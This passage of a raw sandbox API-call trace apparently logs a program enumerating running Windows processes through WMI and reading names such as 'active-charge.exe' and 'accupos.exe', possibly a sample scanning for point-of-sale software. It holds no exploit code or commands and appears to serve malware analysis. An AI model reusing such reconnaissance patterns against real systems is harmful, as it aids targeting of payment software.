This=0x552b6a8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552b6a8) returned 0x0 [0265.323] IUnknown:QueryInterface (in: This=0x552b6a8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.324] IUnknown:QueryInterface (in: This=0x552b6a8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.324] IUnknown:QueryInterface (in: This=0x552b6a8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.324] IUnknown:AddRef (This=0x552b6a8) returned 0x3 [0265.324] IUnknown:QueryInterface (in: This=0x552b6a8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.324] IUnknown:QueryInterface (in: This=0x552b6a8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.324] IUnknown:QueryInterface (in: This=0x552b6a8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552b6ac) returned 0x0 [0265.325] IMarshal:GetUnmarshalClass (in: This=0x552b6ac, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.325] IUnknown:Release (This=0x552b6ac) returned 0x3 [0265.325] IUnknown:QueryInterface (in: This=0x552b6a8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.325] IUnknown:Release (This=0x552b6a8) returned 0x2 [0265.325] IUnknown:QueryInterface (in: This=0x552b6a8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552b6a8) returned 0x0 [0265.325] IUnknown:AddRef (This=0x552b6a8) returned 0x4 [0265.325] IUnknown:Release (This=0x552b6a8) returned 0x3 [0265.325] IUnknown:Release (This=0x552b6a8) returned 0x2 [0265.325] CoTaskMemFree (pv=0x54ba2d8) [0265.325] IUnknown:AddRef (This=0x552b6a8) returned 0x3 [0265.325] IWbemClassObject:Get (in: This=0x552b6a8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.325] IWbemClassObject:Get (in: This=0x552b6a8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4140\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.325] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4140\"") returned 0x5e [0265.325] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4140\"") returned 0x5e [0265.325] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.326] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.326] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.326] IUnknown:Release (This=0x601a94) returned 0x1 [0265.328] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.328] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.328] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a3f8) returned 0x0 [0265.328] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.328] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a3f8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a3f8) returned 0x0 [0265.328] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a3f8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.328] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a3f8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.328] WbemDefPath:IUnknown:AddRef (This=0x552a3f8) returned 0x3 [0265.328] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a3f8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.328] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a3f8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a3f8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5528130) returned 0x0 [0265.329] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5528130, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.329] WbemDefPath:IUnknown:Release (This=0x5528130) returned 0x3 [0265.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a3f8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.329] WbemDefPath:IUnknown:Release (This=0x552a3f8) returned 0x2 [0265.329] WbemDefPath:IUnknown:Release (This=0x552a3f8) returned 0x1 [0265.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a3f8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a3f8) returned 0x0 [0265.329] WbemDefPath:IUnknown:AddRef (This=0x552a3f8) returned 0x3 [0265.329] WbemDefPath:IUnknown:Release (This=0x552a3f8) returned 0x2 [0265.329] WbemDefPath:IWbemPath:SetText (This=0x552a3f8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4140\"") returned 0x0 [0265.329] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.329] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.329] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.329] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.329] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.329] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.329] IWbemClassObject:Get (in: This=0x552b6a8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e2464*=0, plFlavor=0x23e2468*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="active-charge.exe", varVal2=0x0), pType=0x23e2464*=8, plFlavor=0x23e2468*=0) returned 0x0 [0265.330] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0265.330] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0265.330] IWbemClassObject:Get (in: This=0x552b6a8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e2464*=8, plFlavor=0x23e2468*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="active-charge.exe", varVal2=0x0), pType=0x23e2464*=8, plFlavor=0x23e2468*=0) returned 0x0 [0265.330] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0265.330] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0265.330] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.330] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x552c038, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.331] IUnknown:QueryInterface (in: This=0x552c038, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552c038) returned 0x0 [0265.331] IUnknown:QueryInterface (in: This=0x552c038, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.331] IUnknown:QueryInterface (in: This=0x552c038, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.331] IUnknown:QueryInterface (in: This=0x552c038, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.331] IUnknown:AddRef (This=0x552c038) returned 0x3 [0265.331] IUnknown:QueryInterface (in: This=0x552c038, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.332] IUnknown:QueryInterface (in: This=0x552c038, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.332] IUnknown:QueryInterface (in: This=0x552c038, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552c03c) returned 0x0 [0265.332] IMarshal:GetUnmarshalClass (in: This=0x552c03c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.332] IUnknown:Release (This=0x552c03c) returned 0x3 [0265.332] IUnknown:QueryInterface (in: This=0x552c038, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.332] IUnknown:Release (This=0x552c038) returned 0x2 [0265.332] IUnknown:QueryInterface (in: This=0x552c038, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552c038) returned 0x0 [0265.332] IUnknown:AddRef (This=0x552c038) returned 0x4 [0265.332] IUnknown:Release (This=0x552c038) returned 0x3 [0265.332] IUnknown:Release (This=0x552c038) returned 0x2 [0265.332] CoTaskMemFree (pv=0x54ba398) [0265.332] IUnknown:AddRef (This=0x552c038) returned 0x3 [0265.332] IWbemClassObject:Get (in: This=0x552c038, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.332] IWbemClassObject:Get (in: This=0x552c038, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4148\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.333] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4148\"") returned 0x5e [0265.333] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4148\"") returned 0x5e [0265.333] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.333] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.333] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.333] IUnknown:Release (This=0x601a94) returned 0x1 [0265.334] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba3b8) returned 0x0 [0265.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3b8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.334] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3b8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5529f28) returned 0x0 [0265.334] WbemDefPath:IUnknown:Release (This=0x54ba3b8) returned 0x0 [0265.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f28, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5529f28) returned 0x0 [0265.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f28, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f28, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.334] WbemDefPath:IUnknown:AddRef (This=0x5529f28) returned 0x3 [0265.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f28, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f28, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f28, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5527f50) returned 0x0 [0265.335] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5527f50, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.335] WbemDefPath:IUnknown:Release (This=0x5527f50) returned 0x3 [0265.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f28, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.335] WbemDefPath:IUnknown:Release (This=0x5529f28) returned 0x2 [0265.335] WbemDefPath:IUnknown:Release (This=0x5529f28) returned 0x1 [0265.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f28, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5529f28) returned 0x0 [0265.335] WbemDefPath:IUnknown:AddRef (This=0x5529f28) returned 0x3 [0265.336] WbemDefPath:IUnknown:Release (This=0x5529f28) returned 0x2 [0265.336] WbemDefPath:IWbemPath:SetText (This=0x5529f28, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4148\"") returned 0x0 [0265.336] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.336] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.336] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.336] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.336] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.336] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.336] IWbemClassObject:Get (in: This=0x552c038, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e2d08*=0, plFlavor=0x23e2d0c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="accupos.exe", varVal2=0x0), pType=0x23e2d08*=8, plFlavor=0x23e2d0c*=0) returned 0x0 [0265.336] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0265.336] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0265.336] 